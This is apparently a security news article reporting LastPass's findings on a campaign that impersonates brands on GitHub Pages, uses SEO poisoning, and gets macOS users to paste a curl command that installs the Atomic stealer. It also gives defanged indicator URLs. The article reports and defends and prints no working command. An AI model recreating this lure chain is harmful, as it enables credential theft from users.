In an active, large-scale campaign, attackers are posing as legitimate brands on GitHub Pages to target macOS users with the data-skimming “Atomic” stealer.
According to recent findings from LastPass, which itself was targeted in the campaign, attackers are using SEO tricks to push malicious pages to the top of Bing and Google search results, luring users into thinking they’re installing genuine software.
“This campaign appears to be targeting a range of companies, including tech companies, financial institutions, password managers, and more,” LastPass said in a blog post, adding a list of targeted companies. “In the case of LastPass, the fraudulent repositories redirected potential victims to a repository that downloads the Atomic infostealer malware.”
LastPass said that as soon as the fraudulent GitHub sites were spotted, takedown requests were filed, and the pages are now inactive.
Attack combines SEO poisoning with phishing crosshair
Implementing a classic SEO trick, the attackers registered GitHub Pages, which lets developers (or anyone with a GitHub account) take a repository and turn it into a live website for free under names designed to match company names plus “Mac” or “macOS” terminology, boosting their rankings in search results.
Once users click these links, they are routed through redirections, first to a GitHub Pages impersonation, then to a secondary site (e.g., macprograms-pro.com) that instructs the user to paste a shell command into the Mac’s Terminal. This command executes a curl request to a base64-encoded URL, which resolves to a script that downloads and runs the “Update” payload–the Atomic stealer itself.
According to LastPass, splitting the chain into multiple redirections and leveraging legitimate platforms for initial hosting is done for evasion. “Notably, the GitHub pages appear to be created by multiple GitHub usernames to get around takedowns,” the widely used password manager added.
While the fake GitHub sites have been taken down, LastPass warns that the campaign is ongoing and could still pose a significant threat to macOS users.
Macs in the crosshairs
This isn’t the first time adversaries have used search results for delivering the Atomic (AMOS) stealer. Earlier this month, a separate campaign used Google Ads to distribute the malware, which cleverly activated only on systems running x64 or ARM processors.
The Apple ecosystem, prized for its wide adoption and closed design, has seen growing attention from cybercriminals. Earlier this year, Huntress uncovered a suspected nation-state campaign planting modular, persistent malware on macOS. Another round of attacks leveraged Google Meet click-fix lures to push AMOS to Mac users.
Adding to Apple’s woes is a steady churn of zero-day flaws. Last week, the Cupertino giant patched its eighth zero-day of 2025, outpacing the six patched in 2024, though still below the 20 logged in 2023. Each new flaw widens the attack surface for opportunistic and targeted campaigns alike.
LastPass released a list of Indicators of Compromise (IoCs), including URLs such as github[.]com/lastpass-on-macbook, github[.]com/LastPass-on-MacBook/lastpass-premium-mac-download, and ahoastock825[.]github[.]io/.github/lastpass, along with the SHA256 hash of the Atomic payload.
These IoCs offer a starting place for security teams to scan logs, block access, or hunt for compromise.
No Responses